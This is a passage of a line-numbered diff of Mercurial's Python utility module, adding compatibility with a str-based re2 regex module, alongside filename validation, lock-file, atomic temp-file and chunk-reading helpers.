2040 2040 >>> checkwinfilename(b"foo\\/bar")
2041 2041 "directory name ends with '\\', which is invalid on Windows"
2042 2042 """
2043 2043 if path.endswith(b'\\'):
2044 2044 return _(b"filename ends with '\\', which is invalid on Windows")
2045 2045 if b'\\/' in path:
2046 2046 return _(b"directory name ends with '\\', which is invalid on Windows")
2047 2047 for n in path.replace(b'\\', b'/').split(b'/'):
2048 2048 if not n:
2049 2049 continue
2050 2050 for c in _filenamebytestr(n):
2051 2051 if c in _winreservedchars:
2052 2052 return (
2053 2053 _(
2054 2054 b"filename contains '%s', which is reserved "
2055 2055 b"on Windows"
2056 2056 )
2057 2057 % c
2058 2058 )
2059 2059 if ord(c) <= 31:
2060 2060 return _(
2061 2061 b"filename contains '%s', which is invalid on Windows"
2062 2062 ) % stringutil.escapestr(c)
2063 2063 base = n.split(b'.')[0]
2064 2064 if base and base.lower() in _winreservednames:
2065 2065 return (
2066 2066 _(b"filename contains '%s', which is reserved on Windows")
2067 2067 % base
2068 2068 )
2069 2069 t = n[-1:]
2070 2070 if t in b'. ' and n not in b'..':
2071 2071 return (
2072 2072 _(
2073 2073 b"filename ends with '%s', which is not allowed "
2074 2074 b"on Windows"
2075 2075 )
2076 2076 % t
2077 2077 )
2078 2078
2079 2079
2080 2080 timer = getattr(time, "perf_counter", None)
2081 2081
2082 2082 if pycompat.iswindows:
2083 2083 checkosfilename = checkwinfilename
2084 2084 if not timer:
2085 2085 timer = time.clock
2086 2086 else:
2087 2087 # mercurial.windows doesn't have platform.checkosfilename
2088 2088 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2089 2089 if not timer:
2090 2090 timer = time.time
2091 2091
2092 2092
2093 2093 def makelock(info, pathname):
2094 2094 """Create a lock file atomically if possible
2095 2095
2096 2096 This may leave a stale lock file if symlink isn't supported and signal
2097 2097 interrupt is enabled.
2098 2098 """
2099 2099 try:
2100 2100 return os.symlink(info, pathname)
2101 2101 except OSError as why:
2102 2102 if why.errno == errno.EEXIST:
2103 2103 raise
2104 2104 except AttributeError: # no symlink in os
2105 2105 pass
2106 2106
2107 2107 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2108 2108 ld = os.open(pathname, flags)
2109 2109 os.write(ld, info)
2110 2110 os.close(ld)
2111 2111
2112 2112
2113 2113 def readlock(pathname):
2114 2114 try:
2115 2115 return readlink(pathname)
2116 2116 except OSError as why:
2117 2117 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2118 2118 raise
2119 2119 except AttributeError: # no symlink in os
2120 2120 pass
2121 2121 with posixfile(pathname, b'rb') as fp:
2122 2122 return fp.read()
2123 2123
2124 2124
2125 2125 def fstat(fp):
2126 2126 '''stat file object that may not have fileno method.'''
2127 2127 try:
2128 2128 return os.fstat(fp.fileno())
2129 2129 except AttributeError:
2130 2130 return os.stat(fp.name)
2131 2131
2132 2132
2133 2133 # File system features
2134 2134
2135 2135
2136 2136 def fscasesensitive(path):
2137 2137 """
2138 2138 Return true if the given path is on a case-sensitive filesystem
2139 2139
2140 2140 Requires a path (like /foo/.hg) ending with a foldable final
2141 2141 directory component.
2142 2142 """
2143 2143 s1 = os.lstat(path)
2144 2144 d, b = os.path.split(path)
2145 2145 b2 = b.upper()
2146 2146 if b == b2:
2147 2147 b2 = b.lower()
2148 2148 if b == b2:
2149 2149 return True # no evidence against case sensitivity
2150 2150 p2 = os.path.join(d, b2)
2151 2151 try:
2152 2152 s2 = os.lstat(p2)
2153 2153 if s2 == s1:
2154 2154 return False
2155 2155 return True
2156 2156 except OSError:
2157 2157 return True
2158 2158
2159 2159
2160 _re2_input = lambda x: x
2160 2161 try:
2161 2162 import re2 # pytype: disable=import-error
2162 2163
2163 2164 _re2 = None
2164 2165 except ImportError:
2165 2166 _re2 = False
2166 2167
2167 2168
2168 2169 class _re(object):
2169 2170 def _checkre2(self):
2170 2171 global _re2
2172 global _re2_input
2171 2173 try:
2172 2174 # check if match works, see issue3964
2173 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2175 check_pattern = br'\[([^\[]+)\]'
2176 check_input = b'[ui]'
2177 _re2 = bool(re2.match(check_pattern, check_input))
2174 2178 except ImportError:
2175 2179 _re2 = False
2180 except TypeError:
2181 # the `pyre-2` project provides a re2 module that accept bytes
2182 # the `fb-re2` project provides a re2 module that acccept sysstr
2183 check_pattern = pycompat.sysstr(check_pattern)
2184 check_input = pycompat.sysstr(check_input)
2185 _re2 = bool(re2.match(check_pattern, check_input))
2186 _re2_input = pycompat.sysstr
2176 2187
2177 2188 def compile(self, pat, flags=0):
2178 2189 """Compile a regular expression, using re2 if possible
2179 2190
2180 2191 For best performance, use only re2-compatible regexp features. The
2181 2192 only flags from the re module that are re2-compatible are
2182 2193 IGNORECASE and MULTILINE."""
2183 2194 if _re2 is None:
2184 2195 self._checkre2()
2185 2196 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2186 2197 if flags & remod.IGNORECASE:
2187 2198 pat = b'(?i)' + pat
2188 2199 if flags & remod.MULTILINE:
2189 2200 pat = b'(?m)' + pat
2190 2201 try:
2191 return re2.compile(pat)
2202 return re2.compile(_re2_input(pat))
2192 2203 except re2.error:
2193 2204 pass
2194 2205 return remod.compile(pat, flags)
2195 2206
2196 2207 @propertycache
2197 2208 def escape(self):
2198 2209 """Return the version of escape corresponding to self.compile.
2199 2210
2200 2211 This is imperfect because whether re2 or re is used for a particular
2201 2212 function depends on the flags, etc, but it's the best we can do.
2202 2213 """
2203 2214 global _re2
2204 2215 if _re2 is None:
2205 2216 self._checkre2()
2206 2217 if _re2:
2207 2218 return re2.escape
2208 2219 else:
2209 2220 return remod.escape
2210 2221
2211 2222
2212 2223 re = _re()
2213 2224
2214 2225 _fspathcache = {}
2215 2226
2216 2227
2217 2228 def fspath(name, root):
2218 2229 """Get name in the case stored in the filesystem
2219 2230
2220 2231 The name should be relative to root, and be normcase-ed for efficiency.
2221 2232
2222 2233 Note that this function is unnecessary, and should not be
2223 2234 called, for case-sensitive filesystems (simply because it's expensive).
2224 2235
2225 2236 The root should be normcase-ed, too.
2226 2237 """
2227 2238
2228 2239 def _makefspathcacheentry(dir):
2229 2240 return {normcase(n): n for n in os.listdir(dir)}
2230 2241
2231 2242 seps = pycompat.ossep
2232 2243 if pycompat.osaltsep:
2233 2244 seps = seps + pycompat.osaltsep
2234 2245 # Protect backslashes. This gets silly very quickly.
2235 2246 seps.replace(b'\\', b'\\\\')
2236 2247 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2237 2248 dir = os.path.normpath(root)
2238 2249 result = []
2239 2250 for part, sep in pattern.findall(name):
2240 2251 if sep:
2241 2252 result.append(sep)
2242 2253 continue
2243 2254
2244 2255 if dir not in _fspathcache:
2245 2256 _fspathcache[dir] = _makefspathcacheentry(dir)
2246 2257 contents = _fspathcache[dir]
2247 2258
2248 2259 found = contents.get(part)
2249 2260 if not found:
2250 2261 # retry "once per directory" per "dirstate.walk" which
2251 2262 # may take place for each patches of "hg qpush", for example
2252 2263 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2253 2264 found = contents.get(part)
2254 2265
2255 2266 result.append(found or part)
2256 2267 dir = os.path.join(dir, part)
2257 2268
2258 2269 return b''.join(result)
2259 2270
2260 2271
2261 2272 def checknlink(testfile):
2262 2273 '''check whether hardlink count reporting works properly'''
2263 2274
2264 2275 # testfile may be open, so we need a separate file for checking to
2265 2276 # work around issue2543 (or testfile may get lost on Samba shares)
2266 2277 f1, f2, fp = None, None, None
2267 2278 try:
2268 2279 fd, f1 = pycompat.mkstemp(
2269 2280 prefix=b'.%s-' % os.path.basename(testfile),
2270 2281 suffix=b'1~',
2271 2282 dir=os.path.dirname(testfile),
2272 2283 )
2273 2284 os.close(fd)
2274 2285 f2 = b'%s2~' % f1[:-2]
2275 2286
2276 2287 oslink(f1, f2)
2277 2288 # nlinks() may behave differently for files on Windows shares if
2278 2289 # the file is open.
2279 2290 fp = posixfile(f2)
2280 2291 return nlinks(f2) > 1
2281 2292 except OSError:
2282 2293 return False
2283 2294 finally:
2284 2295 if fp is not None:
2285 2296 fp.close()
2286 2297 for f in (f1, f2):
2287 2298 try:
2288 2299 if f is not None:
2289 2300 os.unlink(f)
2290 2301 except OSError:
2291 2302 pass
2292 2303
2293 2304
2294 2305 def endswithsep(path):
2295 2306 '''Check path ends with os.sep or os.altsep.'''
2296 2307 return (
2297 2308 path.endswith(pycompat.ossep)
2298 2309 or pycompat.osaltsep
2299 2310 and path.endswith(pycompat.osaltsep)
2300 2311 )
2301 2312
2302 2313
2303 2314 def splitpath(path):
2304 2315 """Split path by os.sep.
2305 2316 Note that this function does not use os.altsep because this is
2306 2317 an alternative of simple "xxx.split(os.sep)".
2307 2318 It is recommended to use os.path.normpath() before using this
2308 2319 function if need."""
2309 2320 return path.split(pycompat.ossep)
2310 2321
2311 2322
2312 2323 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2313 2324 """Create a temporary file with the same contents from name
2314 2325
2315 2326 The permission bits are copied from the original file.
2316 2327
2317 2328 If the temporary file is going to be truncated immediately, you
2318 2329 can use emptyok=True as an optimization.
2319 2330
2320 2331 Returns the name of the temporary file.
2321 2332 """
2322 2333 d, fn = os.path.split(name)
2323 2334 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2324 2335 os.close(fd)
2325 2336 # Temporary files are created with mode 0600, which is usually not
2326 2337 # what we want. If the original file already exists, just copy
2327 2338 # its mode. Otherwise, manually obey umask.
2328 2339 copymode(name, temp, createmode, enforcewritable)
2329 2340
2330 2341 if emptyok:
2331 2342 return temp
2332 2343 try:
2333 2344 try:
2334 2345 ifp = posixfile(name, b"rb")
2335 2346 except IOError as inst:
2336 2347 if inst.errno == errno.ENOENT:
2337 2348 return temp
2338 2349 if not getattr(inst, 'filename', None):
2339 2350 inst.filename = name
2340 2351 raise
2341 2352 ofp = posixfile(temp, b"wb")
2342 2353 for chunk in filechunkiter(ifp):
2343 2354 ofp.write(chunk)
2344 2355 ifp.close()
2345 2356 ofp.close()
2346 2357 except: # re-raises
2347 2358 try:
2348 2359 os.unlink(temp)
2349 2360 except OSError:
2350 2361 pass
2351 2362 raise
2352 2363 return temp
2353 2364
2354 2365
2355 2366 class filestat(object):
2356 2367 """help to exactly detect change of a file
2357 2368
2358 2369 'stat' attribute is result of 'os.stat()' if specified 'path'
2359 2370 exists. Otherwise, it is None. This can avoid preparative
2360 2371 'exists()' examination on client side of this class.
2361 2372 """
2362 2373
2363 2374 def __init__(self, stat):
2364 2375 self.stat = stat
2365 2376
2366 2377 @classmethod
2367 2378 def frompath(cls, path):
2368 2379 try:
2369 2380 stat = os.stat(path)
2370 2381 except OSError as err:
2371 2382 if err.errno != errno.ENOENT:
2372 2383 raise
2373 2384 stat = None
2374 2385 return cls(stat)
2375 2386
2376 2387 @classmethod
2377 2388 def fromfp(cls, fp):
2378 2389 stat = os.fstat(fp.fileno())
2379 2390 return cls(stat)
2380 2391
2381 2392 __hash__ = object.__hash__
2382 2393
2383 2394 def __eq__(self, old):
2384 2395 try:
2385 2396 # if ambiguity between stat of new and old file is
2386 2397 # avoided, comparison of size, ctime and mtime is enough
2387 2398 # to exactly detect change of a file regardless of platform
2388 2399 return (
2389 2400 self.stat.st_size == old.stat.st_size
2390 2401 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2391 2402 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2392 2403 )
2393 2404 except AttributeError:
2394 2405 pass
2395 2406 try:
2396 2407 return self.stat is None and old.stat is None
2397 2408 except AttributeError:
2398 2409 return False
2399 2410
2400 2411 def isambig(self, old):
2401 2412 """Examine whether new (= self) stat is ambiguous against old one
2402 2413
2403 2414 "S[N]" below means stat of a file at N-th change:
2404 2415
2405 2416 - S[n-1].ctime < S[n].ctime: can detect change of a file
2406 2417 - S[n-1].ctime == S[n].ctime
2407 2418 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2408 2419 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2409 2420 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2410 2421 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2411 2422
2412 2423 Case (*2) above means that a file was changed twice or more at
2413 2424 same time in sec (= S[n-1].ctime), and comparison of timestamp
2414 2425 is ambiguous.
2415 2426
2416 2427 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2417 2428 timestamp is ambiguous".
2418 2429
2419 2430 But advancing mtime only in case (*2) doesn't work as
2420 2431 expected, because naturally advanced S[n].mtime in case (*1)
2421 2432 might be equal to manually advanced S[n-1 or earlier].mtime.
2422 2433
2423 2434 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2424 2435 treated as ambiguous regardless of mtime, to avoid overlooking
2425 2436 by confliction between such mtime.
2426 2437
2427 2438 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2428 2439 S[n].mtime", even if size of a file isn't changed.
2429 2440 """
2430 2441 try:
2431 2442 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2432 2443 except AttributeError:
2433 2444 return False
2434 2445
2435 2446 def avoidambig(self, path, old):
2436 2447 """Change file stat of specified path to avoid ambiguity
2437 2448
2438 2449 'old' should be previous filestat of 'path'.
2439 2450
2440 2451 This skips avoiding ambiguity, if a process doesn't have
2441 2452 appropriate privileges for 'path'. This returns False in this
2442 2453 case.
2443 2454
2444 2455 Otherwise, this returns True, as "ambiguity is avoided".
2445 2456 """
2446 2457 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2447 2458 try:
2448 2459 os.utime(path, (advanced, advanced))
2449 2460 except OSError as inst:
2450 2461 if inst.errno == errno.EPERM:
2451 2462 # utime() on the file created by another user causes EPERM,
2452 2463 # if a process doesn't have appropriate privileges
2453 2464 return False
2454 2465 raise
2455 2466 return True
2456 2467
2457 2468 def __ne__(self, other):
2458 2469 return not self == other
2459 2470
2460 2471
2461 2472 class atomictempfile(object):
2462 2473 """writable file object that atomically updates a file
2463 2474
2464 2475 All writes will go to a temporary copy of the original file. Call
2465 2476 close() when you are done writing, and atomictempfile will rename
2466 2477 the temporary copy to the original name, making the changes
2467 2478 visible. If the object is destroyed without being closed, all your
2468 2479 writes are discarded.
2469 2480
2470 2481 checkambig argument of constructor is used with filestat, and is
2471 2482 useful only if target file is guarded by any lock (e.g. repo.lock
2472 2483 or repo.wlock).
2473 2484 """
2474 2485
2475 2486 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2476 2487 self.__name = name # permanent name
2477 2488 self._tempname = mktempcopy(
2478 2489 name,
2479 2490 emptyok=(b'w' in mode),
2480 2491 createmode=createmode,
2481 2492 enforcewritable=(b'w' in mode),
2482 2493 )
2483 2494
2484 2495 self._fp = posixfile(self._tempname, mode)
2485 2496 self._checkambig = checkambig
2486 2497
2487 2498 # delegated methods
2488 2499 self.read = self._fp.read
2489 2500 self.write = self._fp.write
2490 2501 self.seek = self._fp.seek
2491 2502 self.tell = self._fp.tell
2492 2503 self.fileno = self._fp.fileno
2493 2504
2494 2505 def close(self):
2495 2506 if not self._fp.closed:
2496 2507 self._fp.close()
2497 2508 filename = localpath(self.__name)
2498 2509 oldstat = self._checkambig and filestat.frompath(filename)
2499 2510 if oldstat and oldstat.stat:
2500 2511 rename(self._tempname, filename)
2501 2512 newstat = filestat.frompath(filename)
2502 2513 if newstat.isambig(oldstat):
2503 2514 # stat of changed file is ambiguous to original one
2504 2515 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2505 2516 os.utime(filename, (advanced, advanced))
2506 2517 else:
2507 2518 rename(self._tempname, filename)
2508 2519
2509 2520 def discard(self):
2510 2521 if not self._fp.closed:
2511 2522 try:
2512 2523 os.unlink(self._tempname)
2513 2524 except OSError:
2514 2525 pass
2515 2526 self._fp.close()
2516 2527
2517 2528 def __del__(self):
2518 2529 if safehasattr(self, '_fp'): # constructor actually did something
2519 2530 self.discard()
2520 2531
2521 2532 def __enter__(self):
2522 2533 return self
2523 2534
2524 2535 def __exit__(self, exctype, excvalue, traceback):
2525 2536 if exctype is not None:
2526 2537 self.discard()
2527 2538 else:
2528 2539 self.close()
2529 2540
2530 2541
2531 2542 def unlinkpath(f, ignoremissing=False, rmdir=True):
2532 2543 """unlink and remove the directory if it is empty"""
2533 2544 if ignoremissing:
2534 2545 tryunlink(f)
2535 2546 else:
2536 2547 unlink(f)
2537 2548 if rmdir:
2538 2549 # try removing directories that might now be empty
2539 2550 try:
2540 2551 removedirs(os.path.dirname(f))
2541 2552 except OSError:
2542 2553 pass
2543 2554
2544 2555
2545 2556 def tryunlink(f):
2546 2557 """Attempt to remove a file, ignoring ENOENT errors."""
2547 2558 try:
2548 2559 unlink(f)
2549 2560 except OSError as e:
2550 2561 if e.errno != errno.ENOENT:
2551 2562 raise
2552 2563
2553 2564
2554 2565 def makedirs(name, mode=None, notindexed=False):
2555 2566 """recursive directory creation with parent mode inheritance
2556 2567
2557 2568 Newly created directories are marked as "not to be indexed by
2558 2569 the content indexing service", if ``notindexed`` is specified
2559 2570 for "write" mode access.
2560 2571 """
2561 2572 try:
2562 2573 makedir(name, notindexed)
2563 2574 except OSError as err:
2564 2575 if err.errno == errno.EEXIST:
2565 2576 return
2566 2577 if err.errno != errno.ENOENT or not name:
2567 2578 raise
2568 2579 parent = os.path.dirname(os.path.abspath(name))
2569 2580 if parent == name:
2570 2581 raise
2571 2582 makedirs(parent, mode, notindexed)
2572 2583 try:
2573 2584 makedir(name, notindexed)
2574 2585 except OSError as err:
2575 2586 # Catch EEXIST to handle races
2576 2587 if err.errno == errno.EEXIST:
2577 2588 return
2578 2589 raise
2579 2590 if mode is not None:
2580 2591 os.chmod(name, mode)
2581 2592
2582 2593
2583 2594 def readfile(path):
2584 2595 with open(path, b'rb') as fp:
2585 2596 return fp.read()
2586 2597
2587 2598
2588 2599 def writefile(path, text):
2589 2600 with open(path, b'wb') as fp:
2590 2601 fp.write(text)
2591 2602
2592 2603
2593 2604 def appendfile(path, text):
2594 2605 with open(path, b'ab') as fp:
2595 2606 fp.write(text)
2596 2607
2597 2608
2598 2609 class chunkbuffer(object):
2599 2610 """Allow arbitrary sized chunks of data to be efficiently read from an
2600 2611 iterator over chunks of arbitrary size."""
2601 2612
2602 2613 def __init__(self, in_iter):
2603 2614 """in_iter is the iterator that's iterating over the input chunks."""
2604 2615
2605 2616 def splitbig(chunks):
2606 2617 for chunk in chunks:
2607 2618 if len(chunk) > 2 ** 20:
2608 2619 pos = 0
2609 2620 while pos < len(chunk):
2610 2621 end = pos + 2 ** 18
2611 2622 yield chunk[pos:end]
2612 2623 pos = end
2613 2624 else:
2614 2625 yield chunk
2615 2626
2616 2627 self.iter = splitbig(in_iter)
2617 2628 self._queue = collections.deque()
2618 2629 self._chunkoffset = 0
2619 2630
2620 2631 def read(self, l=None):
2621 2632 """Read L bytes of data from the iterator of chunks of data.
2622 2633 Returns less than L bytes if the iterator runs dry.
2623 2634
2624 2635 If size parameter is omitted, read everything"""
2625 2636 if l is None:
2626 2637 return b''.join(self.iter)
2627 2638
2628 2639 left = l
2629 2640 buf = []
2630 2641 queue = self._queue
2631 2642 while left > 0:
2632 2643 # refill the queue
2633 2644 if not queue:
2634 2645 target = 2 ** 18
2635 2646 for chunk in self.iter:
2636 2647 queue.append(chunk)
2637 2648 target -= len(chunk)
2638 2649 if target <= 0:
2639 2650 break
2640 2651 if not queue:
2641 2652 break
2642 2653
2643 2654 # The easy way to do this would be to queue.popleft(), modify the
2644 2655 # chunk (if necessary), then queue.appendleft(). However, for cases
2645 2656 # where we read partial chunk content, this incurs 2 dequeue
2646 2657 # mutations and creates a new str for the remaining chunk in the
2647 2658 # queue. Our code below avoids this overhead.
2648 2659
2649 2660 chunk = queue[0]
2650 2661 chunkl = len(chunk)
2651 2662 offset = self._chunkoffset
2652 2663
2653 2664 # Use full chunk.
2654 2665 if offset == 0 and left >= chunkl:
2655 2666 left -= chunkl
2656 2667 queue.popleft()
2657 2668 buf.append(chunk)
2658 2669 # self._chunkoffset remains at 0.
2659 2670 continue
2660 2671
2661 2672 chunkremaining = chunkl - offset
2662 2673
2663 2674 # Use all of unconsumed part of chunk.
2664 2675 if left >= chunkremaining:
2665 2676 left -= chunkremaining
2666 2677 queue.popleft()
2667 2678 # offset == 0 is enabled by block above, so this won't merely
2668 2679 # copy via ``chunk[0:]``.
2669 2680 buf.append(chunk[offset:])
2670 2681 self._chunkoffset = 0
2671 2682
2672 2683 # Partial chunk needed.
2673 2684 else:
2674 2685 buf.append(chunk[offset : offset + left])
2675 2686 self._chunkoffset += left
2676 2687 left -= chunkremaining
2677 2688
2678 2689 return b''.join(buf)
2679 2690
2680 2691
2681 2692 def filechunkiter(f, size=131072, limit=None):
2682 2693 """Create a generator that produces the data in the file size
2683 2694 (default 131072) bytes at a time, up to optional limit (default is
2684 2695 to read all data). Chunks may be less than size bytes if the
2685 2696 chunk is the last chunk in the file, or the file is a socket or
2686 2697 some other type of file that sometimes reads less data than is
2687 2698 requested."""
2688 2699 assert size >= 0
2689 2700 assert limit is None or limit >= 0
2690 2701 while True:
2691 2702 if limit is None:
2692 2703 nbytes = size
2693 2704 else:
2694 2705 nbytes = min(limit, size)
2695 2706 s = nbytes and f.read(nbytes)
2696 2707 if not s:
2697 2708 break
2698 2709 if limit:
2699 2710 limit -= len(s)
2700 2711 yield s
2701 2712
2702 2713
2703 2714 class cappedreader(object):
2704 2715 """A file object proxy that allows reading up to N bytes.
2705 2716
2706 2717 Given a source file object, instances of this type allow reading up to
2707 2718 N bytes from that source file object. Attempts to read past the allowed
2708 2719 limit are treated as EOF.
2709 2720
2710 2721 It is assumed that I/O is not performed on the original file object
2711 2722 in addition to I/O that is performed by this instance. If there is,
2712 2723 state tracking will get out of sync and unexpected results will ensue.
2713 2724 """
2714 2725
2715 2726 def __init__(self, fh, limit):
2716 2727 """Allow reading up to <limit> bytes from <fh>."""
2717 2728 self._fh = fh
2718 2729 self._left = limit
2719 2730
2720 2731 def read(self, n=-1):
2721 2732 if not self._left:
2722 2733 return b''
2723 2734
2724 2735 if n < 0:
2725 2736 n = self._left
2726 2737
2727 2738 data = self._fh.read(min(n, self._left))
2728 2739 self._left -= len(data)
2729 2740 assert self._left >= 0
2730 2741
2731 2742 return data
2732 2743
2733 2744 def readinto(self, b):
2734 2745 res = self.read(len(b))
2735 2746 if res is None:
2736 2747 return None
2737 2748
2738 2749 b[0 : len(res)] = res
2739 2750 return len(res)
2740 2751
2741 2752
2742 2753 def unitcountfn(*unittable):
2743 2754 '''return a function that renders a readable count of some quantity'''
2744 2755
2745 2756 def go(count):
2746 2757 for multiplier, divisor, format in unittable:
2747 2758 if abs(count) >= divisor * multiplier:
2748 2759 return format % (count / float(divisor))
2749 2760 return unittable[-1][2] % count
2750 2761
2751 2762 return go
2752 2763
2753 2764
2754 2765 def processlinerange(fromline, toline):
2755 2766 """Check that linerange <fromline>:<toline> makes sense and return a
2756 2767 0-based range.
2757 2768
2758 2769 >>> processlinerange(10, 20)
2759 2770 (9, 20)
2760 2771 >>> processlinerange(2, 1)
2761 2772 Traceback (most recent call last):
2762 2773 ...
2763 2774 ParseError: line range must be positive
2764 2775 >>> processlinerange(0, 5)
2765 2776 Traceback (most recent call last):
2766 2777 ...
2767 2778 ParseError: fromline must be strictly positive
2768 2779 """
2769 2780 if toline - fromline < 0:
2770 2781 raise error.ParseError(_(b"line range must be positive"))
2771 2782 if fromline < 1:
2772 2783 raise error.ParseError(_(b"fromline must be strictly positive"))
2773 2784 return fromline - 1, toline
2774 2785
2775 2786
2776 2787 bytecount = unitcountfn(
2777 2788 (100, 1 << 30, _(b'%.0f GB')),
2778 2789 (10, 1 << 30, _(b'%.1f GB')),
2779 2790 (1, 1 << 30, _(b'%.2f GB')),
2780 2791 (100, 1 << 20, _(b'%.0f MB')),
2781 2792 (10, 1 << 20, _(b'%.1f MB')),
2782 2793 (1, 1 << 20, _(b'%.2f MB')),
2783 2794 (100, 1 << 10, _(b'%.0f KB')),
2784 2795 (10, 1 << 10, _(b'%.1f KB')),
2785 2796 (1, 1 << 10, _(b'%.2f KB')),
2786 2797 (1, 1, _(b'%.0f bytes')),
2787 2798 )
2788 2799
2789 2800
2790 2801 class transformingwriter(object):
2791 2802 """Writable file wrapper to transform data by function"""
2792 2803
2793 2804 def __init__(self, fp, encode):
2794 2805 self._fp = fp
2795 2806 self._encode = encode
2796 2807
2797 2808 def close(self):
2798 2809 self._fp.close()
2799 2810
2800 2811 def flush(self):
2801 2812 self._fp.flush()
2802 2813
2803 2814 def write(self, data):
2804 2815 return self._fp.write(self._encode(data))
2805 2816
2806 2817
2807 2818 # Matches a single EOL which can either be a CRLF where repeated CR
2808 2819 # are removed or a LF. We do not care about old Macintosh files, so a
2809 2820 # stray CR is an error.
2810 2821 _eolre = remod.compile(br'\r*\n')
2811 2822
2812 2823
2813 2824 def tolf(s):
2814 2825 return _eolre.sub(b'\n', s)
2815 2826
2816 2827
2817 2828 def tocrlf(s):
2818 2829 return _eolre.sub(b'\r\n', s)
2819 2830
2820 2831
2821 2832 def _crlfwriter(fp):
2822 2833 return transformingwriter(fp, tocrlf)
2823 2834
2824 2835
2825 2836 if pycompat.oslinesep == b'\r\n':
2826 2837 tonativeeol = tocrlf
2827 2838 fromnativeeol = tolf
2828 2839 nativeeolwriter = _crlfwriter
2829 2840 else:
2830 2841 tonativeeol = pycompat.identity
2831 2842 fromnativeeol = pycompat.identity
2832 2843 nativeeolwriter = pycompat.identity
2833 2844
2834 2845 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2835 2846 3,
2836 2847 0,
2837 2848 ):
2838 2849 # There is an issue in CPython that some IO methods do not handle EINTR
2839 2850 # correctly. The following table shows what CPython version (and functions)
2840 2851 # are affected (buggy: has the EINTR bug, okay: otherwise):
2841 2852 #
2842 2853 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2843 2854 # --------------------------------------------------
2844 2855 # fp.__iter__ | buggy | buggy | okay
2845 2856 # fp.read* | buggy | okay [1] | okay
2846 2857 #
2847 2858 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2848 2859 #
2849 2860 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2850 2861 # like "read*" work fine, as we do not support Python < 2.7.4.
2851 2862 #
2852 2863 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2853 2864 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2854 2865 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2855 2866 # fp.__iter__ but not other fp.read* methods.
2856 2867 #
2857 2868 # On modern systems like Linux, the "read" syscall cannot be interrupted
2858 2869 # when reading "fast" files like on-disk files. So the EINTR issue only
2859 2870 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2860 2871 # files approximately as "fast" files and use the fast (unsafe) code path,
2861 2872 # to minimize the performance impact.
2862 2873
2863 2874 def iterfile(fp):
2864 2875 fastpath = True
2865 2876 if type(fp) is file:
2866 2877 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2867 2878 if fastpath:
2868 2879 return fp
2869 2880 else:
2870 2881 # fp.readline deals with EINTR correctly, use it as a workaround.
2871 2882 return iter(fp.readline, b'')
2872 2883
2873 2884
2874 2885 else:
2875 2886 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2876 2887 def iterfile(fp):
2877 2888 return fp
2878 2889
2879 2890
2880 2891 def iterlines(iterator):
2881 2892 for chunk in iterator:
2882 2893 for line in chunk.splitlines():
2883 2894 yield line
2884 2895
2885 2896
2886 2897 def expandpath(path):
2887 2898 return os.path.expanduser(os.path.expandvars(path))
2888 2899
2889 2900
2890 2901 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2891 2902 """Return the result of interpolating items in the mapping into string s.
2892 2903
2893 2904 prefix is a single character string, or a two character string with
2894 2905 a backslash as the first character if the prefix needs to be escaped in
2895 2906 a regular expression.
2896 2907
2897 2908 fn is an optional function that will be applied to the replacement text
2898 2909 just before replacement.
2899 2910
2900 2911 escape_prefix is an optional flag that allows using doubled prefix for
2901 2912 its escaping.
2902 2913 """
2903 2914 fn = fn or (lambda s: s)
2904 2915 patterns = b'|'.join(mapping.keys())
2905 2916 if escape_prefix:
2906 2917 patterns += b'|' + prefix
2907 2918 if len(prefix) > 1:
2908 2919 prefix_char = prefix[1:]
2909 2920 else:
2910 2921 prefix_char = prefix
2911 2922 mapping[prefix_char] = prefix_char
2912 2923 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2913 2924 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2914 2925
2915 2926
2916 2927 def getport(port):
2917 2928 """Return the port for a given network service.
2918 2929
2919 2930 If port is an integer, it's returned as is. If it's a string, it's
2920 2931 looked up using socket.getservbyname(). If there's no matching
2921 2932 service, error.Abort is raised.
2922 2933 """
2923 2934 try:
2924 2935 return int(port)
2925 2936 except ValueError:
2926 2937 pass
2927 2938
2928 2939 try:
2929 2940 return socket.getservbyname(pycompat.sysstr(port))
2930 2941 except socket.error:
2931 2942 raise error.Abort(
2932 2943 _(b"no port number associated with service '%s'") % port
2933 2944 )
2934 2945
2935 2946
2936 2947 class url(object):
2937 2948 r"""Reliable URL parser.
2938 2949
2939 2950 This parses URLs and provides attributes for the following
2940 2951 components:
2941 2952
2942 2953 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2943 2954
2944 2955 Missing components are set to None. The only exception is
